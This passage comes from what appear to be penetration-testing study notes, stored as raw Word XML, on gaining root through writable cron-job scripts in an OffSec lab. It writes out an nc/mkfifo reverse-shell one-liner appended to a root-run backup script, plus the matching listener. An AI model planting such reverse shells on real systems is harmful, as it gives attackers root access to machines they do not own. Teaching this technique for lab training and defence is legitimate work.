        <w:t xml:space="preserve"> time-based job scheduler is a prime target, since system-level scheduled jobs are executed with root user privileges and system administrators often create scripts for cron jobs with insecure permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002422">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this example, we will SSH into the VM 1 as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">joe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, providing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offsec</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a password. In a previous section, we demonstrated where to check the filesystem for installed cron jobs on a target system. We could also inspect the cron log file (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for running cron jobs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002423">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002424">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2235200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="397" name="image410.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image410.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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2425">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1070"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">grep "CRON" /var/log/syslog</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002426">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002427">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It appears that a script called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user_backups.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> under </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/home/joe/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed in the context of the root user. Judging by the timestamps, it seems that this job runs once every minute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002428">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since we know the location of the script, we can inspect its contents and permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002429">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1943100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="543" name="image528.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image528.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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242B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /home/joe/.scripts/user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="302"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls -lah /home/joe/.scripts/user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The script itself is fairly straight-forward: it simply copies the user's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">home</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">backups</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> subdirectory. The</w:t>
      </w:r>
      <w:hyperlink r:id="rId763">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId764">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">permissions</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the script reveal that every local user can write to the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000242F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since an unprivileged user can modify the contents of the backup script, we can edit it and add a reverse shell</w:t>
      </w:r>
      <w:hyperlink r:id="rId765">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId766">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">one-liner</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If our plan works, we should receive a root-level reverse shell on our attacking machine after, at most, a one-minute period.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002430">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002431">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2921000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="97" name="image87.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image87.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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2432">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd .scripts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002433">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo &gt;&gt; user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002434">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We appended a blank line to make sure our reverse shell was written on a fresh line and not appended to an already existing line</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002435">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.118.2 1234 &gt;/tmp/f" &gt;&gt; user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002436">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="470"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat user_backups.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002437">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002438">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">All we must do now is set up a listener on our Kali Linux machine and wait for the cron job to execute:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002439">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1828800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="526" name="image509.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image509.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76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243B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="310"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243E">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the previous listing, the cron job did execute, as well as the reverse shell one-liner. We have successfully elevated our privileges and have access to a root shell on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000243F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this was a simple example, it is not uncommon to find similar situations in the field since administrators are often more focused on pushing systems into production rather than securing script file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002440">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002441">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_le2h7evnnrxl" w:id="322"/>
      <w:bookmarkEnd w:id="322"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replacing a file being run as root using bash (found via pspy64)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002442">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId769">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Flu</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443">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002444">
      <w:pPr>
        <w:ind w:left="-1170" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7128669" cy="1336625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="163" name="image163.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image163.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId770"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7128669" cy="1336625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002445">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We didn't look at cron jobs, but we did see this scheduled task that was running in pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002446">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason why we wanted to investigate this further is because we saw the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory which is a fan favorite for exploitation in offsec since it includes 3rd party non-standard files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002447">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1220"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we go manually look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/log-backup.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see we have edit permissions!</w:t>
      </w:r>
    </w:p>
